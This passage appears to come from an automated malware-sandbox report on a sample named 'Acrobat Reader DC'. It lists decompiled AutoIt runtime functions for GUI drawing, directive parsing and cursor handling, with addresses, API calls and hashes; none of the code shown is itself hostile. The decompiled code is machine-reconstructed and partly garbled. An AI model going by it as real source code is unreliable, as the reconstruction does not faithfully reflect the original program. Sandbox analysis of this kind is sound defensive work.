						__eflags = _t106 - 0xffffffff;
						if(_t106 == 0xffffffff) {
							_t106 = GetSysColor(0x12);
							goto L6;
						}
					} else {
						_t106 = GetSysColor(0xe);
						L6:
					}
					_v52.top.left = SetTextColor(_t213, _t106);
					_t108 = _a8[0x11];
					__eflags = _t108 - 0xffffffff;
					if(_t108 != 0xffffffff) {
						_v68.top.left = CreateSolidBrush(_t108);
						_t111 = _a8[0x11];
					} else {
						_v68.right.left = GetSysColorBrush(0xf);
						_t111 = GetSysColor(0xf);
					}
					_v52.right = SetBkColor(_t213, _t111);
					_t113 = SelectObject(_t213, _v72);
					__eflags = _v76;
					_v68.bottom = _t113;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 != 0) {
							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						}
						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
					} else {
						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						_t160 = CreateSolidBrush(GetSysColor(0x10));
						_v68.left = _t160;
						FrameRect(_t213,  &_v52, _t160);
						DeleteObject(_v68.left);
					}
					__eflags = _v76;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 == 0) {
							InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
						} else {
							InflateRect( &(_v52.top), 0xfffffffd, 0xfffffffd);
						}
						_v52.top.left = _v52.top.left - 1;
						_t51 =  &(_v52.right);
						 *_t51 = _v52.right - 1;
						__eflags =  *_t51;
					} else {
						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
					}
					FillRect(_t213,  &(_v52.top), _v80);
					__eflags = _v88;
					if(_v88 != 0) {
						L23:
						_v68.right.left = _v68.right.left + 2;
						_t58 =  &(_v68.bottom);
						 *_t58 = _v68.bottom + 2;
						__eflags =  *_t58;
					} else {
						__eflags = _t168;
						if(_t168 != 0) {
							goto L23;
						}
					}
					_t169 = _a8;
					_v88 = 0x105;
					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
					if(__eflags == 0) {
						_v88 = 0x125;
					}
					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
					_t170 = _t65;
					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
					_t127 = E004115D7(_t213, _t217, __eflags);
					_v76 = _t127;
					GetWindowTextW( *_a8, _t127, _t170);
					_t171 = _v76;
					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
					__eflags = _v72;
					if(_v72 != 0) {
						_v52.left =  *(_t217 + 0x24);
						_t191 =  *(_t217 + 0x20) + 1;
						__eflags = _t191;
						_v52.top.left =  *(_t217 + 0x28);
						_v68.right.left =  *(_t217 + 0x1c) + 1;
						_v68.bottom = _t191;
						SetTextColor(_t213, GetSysColor(0x11));
						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
					}
					__eflags = _v84;
					if(_v84 != 0) {
						_v68.right.left =  *(_t217 + 0x1c);
						_v68.bottom =  *(_t217 + 0x20);
						_v52.left =  *(_t217 + 0x24);
						_v52.top.left =  *(_t217 + 0x28);
						_t219 = CreateSolidBrush(0);
						FrameRect(_t213,  &(_v68.top), _t219);
						DeleteObject(_t219);
						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
						DrawFocusRect(_t213,  &_v68);
					}
					_push(_t171);
					E004111DC();
					SelectObject(_t213, _v68);
					DeleteObject(_v100);
					SetTextColor(_t213, _v92);
					SetBkColor(_t213, _v84);
					return 1;
				} else {
					return E004308EF(_t217, _a8);
				}
			}
































                                  0x004417d1
                                  0x004417d5
                                  0x004417ea
                                  0x004417ed
                                  0x004417f4
                                  0x004417fd
                                  0x00441801
                                  0x00441805
                                  0x00441809
                                  0x0044180b
                                  0x00441814
                                  0x00441817
                                  0x0044181a
                                  0x0044181e
                                  0x00000000
                                  0x0044181e
                                  0x0044180d
                                  0x0044181e
                                  0x0044181e
                                  0x0044181e
                                  0x0044182f
                                  0x00441833
                                  0x00441836
                                  0x00441839
                                  0x00441858
                                  0x0044185f
                                  0x0044183b
                                  0x00441845
                                  0x00441849
                                  0x00441849
                                  0x00441870
                                  0x00441874
                                  0x0044187a
                                  0x00441885
                                  0x0044188c
                                  0x00441893
                                  0x00441897
                                  0x0044189b
                                  0x0044189f
                                  0x004418dd
                                  0x004418e2
                                  0x004418ed
                                  0x004418ed
                                  0x004418fd
                                  0x004418a1
                                  0x004418aa
                                  0x004418b9
                                  0x004418c6
                                  0x004418ca
                                  0x004418d5
                                  0x004418d5
                                  0x00441903
                                  0x00441911
                                  0x00441918
                                  0x0044191c
                                  0x00441920
                                  0x00441924
                                  0x00441937
                                  0x0044193c
                                  0x00441952
                                  0x0044193e
                                  0x00441952
                                  0x00441952
                                  0x0044195d
                                  0x00441961
                                  0x00441961
                                  0x00441961
                                  0x00441926
                                  0x0044192f
                                  0x0044192f
                                  0x00441970
                                  0x00441976
                                  0x0044197b
                                  0x00441981
                                  0x00441986
                                  0x0044198a
                                  0x0044198a
                                  0x0044198a
                                  0x0044197d
                                  0x0044197d
                                  0x0044197f
                                  0x00000000
                                  0x00000000
                                  0x0044197f
                                  0x0044198e
                                  0x00441996
                                  0x004419a4
                                  0x004419a9
                                  0x004419ab
                                  0x004419ab
                                  0x004419c2
                                  0x004419c2
                                  0x004419d7
                                  0x004419d8
                                  0x004419e2
                                  0x004419ec
                                  0x004419f6
                                  0x00441a04
                                  0x00441a0a
                                  0x00441a0f
                                  0x00441a1a
                                  0x00441a22
                                  0x00441a22
                                  0x00441a25
                                  0x00441a29
                                  0x00441a2d
                                  0x00441a39
                                  0x00441a4d
                                  0x00441a4d
                                  0x00441a53
                                  0x00441a58
                                  0x00441a63
                                  0x00441a6c
                                  0x00441a70
                                  0x00441a74
                                  0x00441a7e
                                  0x00441a87
                                  0x00441a8e
                                  0x00441a9d
                                  0x00441aa9
                                  0x00441aa9
                                  0x00441aaf
                                  0x00441ab0
                                  0x00441abe
                                  0x00441ac9
                                  0x00441ad5
                                  0x00441ae1
                                  0x00441af2
                                  0x004417d7
                                  0x004417e7
                                  0x004417e7

                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32 ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32 ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 69173610-0
                                  • Opcode ID: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00403A20(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E00422240(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E0041341F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E0041341F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E0041341F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E0041341F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E0041341F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E0041341F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E0041341F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													__eflags = E0046FD6C(__eflags, _a16, _t120);
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E00444BBB(_t98, __eflags, _t120);
													E00444B5F(_t98, _t120);
													_t58 = E0041341F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E0041341F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E0041341F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E0041341F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E00454014(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E0041341F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E00444BFC();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E00454014(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E00410190(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E004033C0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E004114AB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E00410160(_t120 + 0x2c, __eflags);
								E00444B5F(_t98, _t122);
								E00444BBB(_t98, __eflags, _t122);
								_t86 = E004111C1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E00444B5F(0, _t119);
									E00444BBB(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E004111DC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}








































                                  0x00403a20
                                  0x00403a20
                                  0x00403a28
                                  0x00403a2f
                                  0x00403a37
                                  0x00428412
                                  0x00428414
                                  0x00428419
                                  0x0042841c
                                  0x0042841e
                                  0x00428435
                                  0x0042843a
                                  0x0042843d
                                  0x0042843f
                                  0x00428457
                                  0x0042845c
                                  0x0042845f
                                  0x00428461
                                  0x00428479
                                  0x0042847e
                                  0x00428481
                                  0x00428483
                                  0x004284ed
                                  0x004284f2
                                  0x004284f5
                                  0x004284f7
                                  0x0042854d
                                  0x00428552
                                  0x00428555
                                  0x00428557
                                  0x004285bd
                                  0x004285c2
                                  0x004285c5
                                  0x004285c7
                                  0x004285e1
                                  0x004285e1
                                  0x004285e4
                                  0x004285eb
                                  0x004285f5
                                  0x004285f7
                                  0x00000000
                                  0x00000000
                                  0x004285f9
                                  0x004285fc
                                  0x00428602
                                  0x0042860f
                                  0x00428614
                                  0x00428617
                                  0x00428619
                                  0x0042866c
                                  0x0042866c
                                  0x00000000
                                  0x0042866c
                                  0x00428623
                                  0x00428628
                                  0x0042862b
                                  0x0042862d
                                  0x00000000
                                  0x00000000
                                  0x00428637
                                  0x0042863c
                                  0x0042863f
                                  0x00428641
                                  0x00428657
                                  0x0042865a
                                  0x0042865b
                                  0x0042865e
                                  0x00428660
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428662
                                  0x0042864b
                                  0x00428650
                                  0x00428653
                                  0x00428655
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428655
                                  0x00428674
                                  0x00428678
                                  0x00428423
                                  0x00000000
                                  0x00428423
                                  0x0042868c
                                  0x00000000
                                  0x00428691
                                  0x004285d1
                                  0x004285d6
                                  0x004285d9
                                  0x004285db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004285db
                                  0x0042855f
                                  0x00428563
                                  0x00428564
                                  0x00428565
                                  0x0042856d
                                  0x00428570
                                  0x00428572
                                  0x00428574
                                  0x004285a9
                                  0x00000000
                                  0x004285ae
                                  0x00428576
                                  0x00428577
                                  0x00428578
                                  0x00428584
                                  0x0042858b
                                  0x0042858c
                                  0x0042858d
                                  0x00428594
                                  0x00000000
                                  0x00428599
                                  0x004284f9
                                  0x004284fc
                                  0x00000000
                                  0x00000000
                                  0x00428502
                                  0x00428502
                                  0x00428504
                                  0x00428511
                                  0x00428516
                                  0x00428519
                                  0x0042851b
                                  0x00000000
                                  0x00000000
                                  0x0042851d
                                  0x0042851e
                                  0x00428521
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00428523
                                  0x00428535
                                  0x00000000
                                  0x0042853f
                                  0x0042848d
                                  0x00428490
                                  0x00428496
                                  0x0042849c
                                  0x004284a4
                                  0x004284aa
                                  0x004284c5
                                  0x004284ac
                                  0x004284ae
                                  0x004284ae
                                  0x004284b2
                                  0x004284b7
                                  0x004284bd
                                  0x004284c2
                                  0x004284c2
                                  0x004284d0
                                  0x004284d2
                                  0x004284d3
                                  0x00000000
                                  0x004284db
                                  0x00428463
                                  0x00000000
                                  0x00428467
                                  0x00428441
                                  0x00000000
                                  0x00428445
                                  0x00428420
                                  0x00000000
                                  0x00428420
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430737(signed int _a4) {
				signed int _t4;

				_t4 = _a4;
				if(_t4 > 0x10) {
					L16:
					return SetCursor(LoadCursorW(0, 0x7f00));
				} else {
					switch( *((intOrPtr*)(_t4 * 4 +  &M004308AB))) {
						case 0:
							return SetCursor(LoadCursorW(0, 0x7f89));
							goto L17;
						case 1:
							__eax = LoadCursorW(0, 0x7f8a);
							return __eax;
							goto L17;
						case 2:
							goto L16;
						case 3:
							__eax = LoadCursorW(0, 0x7f03);
							return __eax;
							goto L17;
						case 4:
							__eax = LoadCursorW(0, 0x7f8b);
							return __eax;
							goto L17;
						case 5:
							__eax = LoadCursorW(0, 0x7f01);
							return __eax;
							goto L17;
						case 6:
							__eax = LoadCursorW(0, 0x7f88);
							return __eax;
							goto L17;
						case 7:
							__eax = LoadCursorW(0, 0x7f86);
							return __eax;
							goto L17;
						case 8:
							__eax = LoadCursorW(0, 0x7f83);
							return __eax;
							goto L17;
						case 9:
							__eax = LoadCursorW(0, 0x7f85);
							return __eax;
							goto L17;
						case 0xa:
							__eax = LoadCursorW(0, 0x7f82);
							return __eax;
							goto L17;
						case 0xb:
							__eax = LoadCursorW(0, 0x7f84);
							return __eax;
							goto L17;
						case 0xc:
							__eax = LoadCursorW(0, 0x7f04);
							return __eax;
							goto L17;
						case 0xd:
							__eax = LoadCursorW(0, 0x7f02);
							return __eax;
							goto L17;
						case 0xe:
							return SetCursor(0);
							goto L17;
					}
				}
				L17:
			}




                                  0x0043073a
                                  0x00430740
                                  0x00430891
                                  0x004308a6
                                  0x00430746
                                  0x00430746
                                  0x00000000
                                  0x00430762
                                  0x00000000
                                  0x00000000
                                  0x0043076c
                                  0x0043077a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00430784
                                  0x00430792
                                  0x00000000
                                  0x00000000
                                  0x0043079c
                                  0x004307aa
                                  0x00000000
                                  0x00000000
                                  0x004307b4
                                  0x004307c2
                                  0x00000000
                                  0x00000000
                                  0x004307cc
                                  0x004307da
                                  0x00000000
                                  0x00000000
                                  0x004307e4
                                  0x004307f2
                                  0x00000000
                                  0x00000000
                                  0x004307fc
                                  0x0043080a
                                  0x00000000
                                  0x00000000
                                  0x00430814
                                  0x00430822
                                  0x00000000
                                  0x00000000
                                  0x0043082c
                                  0x0043083a
                                  0x00000000
                                  0x00000000
                                  0x00430844
                                  0x00430852
                                  0x00000000
                                  0x00000000
                                  0x0043085c
                                  0x0043086a
                                  0x00000000
                                  0x00000000
                                  0x00430874
                                  0x00430882
                                  0x00000000
                                  0x00000000
                                  0x0043088e
                                  0x00000000
                                  0x00000000
                                  0x00430746
                                  0x00000000

                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E004308EF(struct HBRUSH__* _a4, struct HWND__** _a8) {
				long _v8;
				long _v12;
				signed int _v16;
				int _v20;
				signed int _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				struct tagRECT _v60;
				void* __edi;
				void* __esi;
				signed int _t72;
				signed int _t73;
				long _t74;
				long _t75;
				long _t76;
				long _t78;
				long _t79;
				void* _t80;
				signed int _t93;
				WCHAR* _t95;
				struct HWND__** _t117;
				struct HBRUSH__* _t149;
				WCHAR* _t150;
				struct HDC__* _t152;
				signed int _t159;

				_t149 = _a4;
				_t72 =  *(_t149 + 0x10);
				_t152 =  *(_t149 + 0x18);
				_t73 = _t72 & 0x00000006;
				_v24 = _t72 & 0x00000010;
				_v16 = _t73;
				if(_t73 == 0) {
					_t117 = _a8;
					_t74 =  *(_t117 + 0x48);
					__eflags = _t74 - 0xffffffff;
					if(__eflags == 0) {
						_t74 = GetSysColor(0x12);
					}
					_t75 = SetTextColor(_t152, _t74);
				} else {
					_t75 = SetTextColor(_t152, GetSysColor(0xe));
					_t117 = _a8;
				}
				_v8 = _t75;
				_t76 =  *(_t117 + 0x44);
				if(_t76 != 0xffffffff) {
					_a4 = CreateSolidBrush(_t76);
					_t78 =  *(_t117 + 0x44);
				} else {
					_a4 = GetSysColorBrush(0xf);
					_t78 = GetSysColor(0xf);
				}
				_v12 = _t78;
				if(_v16 == 0) {
					_t79 = 0x743c00;
				} else {
					_t79 = GetSysColor(0x11);
				}
				_t80 = CreatePen(0, 1, _t79);
				_v40 = _t80;
				_v36 = SelectObject(_t152, _t80);
				_v44 = SetBkColor(_t152, _v12);
				_v32 = SelectObject(_t152, _a4);
				_v60.top =  *(_t149 + 0x20);
				_v60.left =  *(_t149 + 0x1c);
				_v60.right =  *(_t149 + 0x24);
				_v60.bottom =  *(_t149 + 0x28);
				InflateRect( &_v60, 0xffffffff, 0xffffffff);
				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
				_v12 = 0x105;
				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
				if(_t159 == 0) {
					_v12 = 0x125;
				}
